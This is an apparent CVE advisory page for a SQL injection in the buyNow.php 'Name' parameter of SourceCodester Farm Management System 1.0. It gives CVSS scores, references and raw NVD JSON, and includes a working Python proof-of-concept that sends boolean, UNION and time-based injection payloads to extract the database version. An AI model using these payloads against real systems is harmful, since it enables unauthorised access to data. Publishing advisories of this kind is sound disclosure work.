CVE-2025-11486

Description

A vulnerability was identified in SourceCodester Farm Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /buyNow.php. Such manipulation of the argument Name leads to sql injection. The attack can be launched remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:janobe:farm_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester Farm Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11486 PoC - SQL Injection in buyNow.php
# Target: SourceCodester Farm Management System 1.0
# Vulnerable Parameter: Name
# Author: DrNbnonono

import requests

TARGET_URL = "http://target.com/buyNow.php"

# Step 1: Login to obtain a valid session (low privilege required)
session = requests.Session()
login_data = {
    "username": "test_user",
    "password": "test_password",
    "login": "submit"
}
session.post("{}/login.php".format(TARGET_URL.rsplit('/', 1)[0]), data=login_data)

# Step 2: Exploit SQL Injection via the 'Name' parameter
# Payload 1: Boolean-based blind SQLi to verify the vulnerability
payload_true = "test' OR '1'='1"
payload_false = "test' OR '1'='2"

resp_true = session.post(TARGET_URL, data={"Name": payload_true})
resp_false = session.post(TARGET_URL, data={"Name": payload_false})

if len(resp_true.text) != len(resp_false.text):
    print("[+] Vulnerability confirmed! Boolean-based SQLi works.")
else:
    print("[-] Could not confirm vulnerability via boolean-based method.")

# Step 3: Extract database version using UNION-based SQLi
# Adjust column count based on the original query
payload_union = "test' UNION SELECT 1,version(),3,4-- -"
resp_union = session.post(TARGET_URL, data={"Name": payload_union})

if "MySQL" in resp_union.text or "MariaDB" in resp_union.text:
    print("[+] Database version leaked successfully!")
    # Extract and print the leaked version info
    import re
    match = re.search(r'(MySQL|MariaDB)[^<]*', resp_union.text)
    if match:
        print("[+] Version: " + match.group(0))

# Step 4: Time-based blind SQLi to extract data
import time
payload_time = "test' OR IF(1=1,SLEEP(3),0)-- -"
start = time.time()
session.post(TARGET_URL, data={"Name": payload_time})
elapsed = time.time() - start

if elapsed >= 3:
    print("[+] Time-based SQLi confirmed. Server is vulnerable.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11486
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11486
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11486/
[4] VulDB https://vuldb.com/cve/CVE-2025-11486
[5] https://github.com/DrNbnonono/CVE/issues/10
[6] https://vuldb.com/?ctiid.327603
[7] https://vuldb.com/?id.327603
[8] https://vuldb.com/?submit.667414
[9] https://www.sourcecodester.com/
[10] https://github.com/DrNbnonono/CVE/issues/10

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11486", "sourceIdentifier": "[email protected]", "published": "2025-10-08T17:15:34.260", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in SourceCodester Farm Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /buyNow.php. Such manipulation of the argument Name leads to sql injection. The attack can be launched remotely. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:janobe:farm_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "CADF7506-C817-4FA2-A728-C1BF2AD8034D"}]}]}], "references": [{"url": "https://github.com/DrNbnonono/CVE/issues/10", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327603", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327603", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.667414", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/DrNbnonono/CVE/issues/10", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}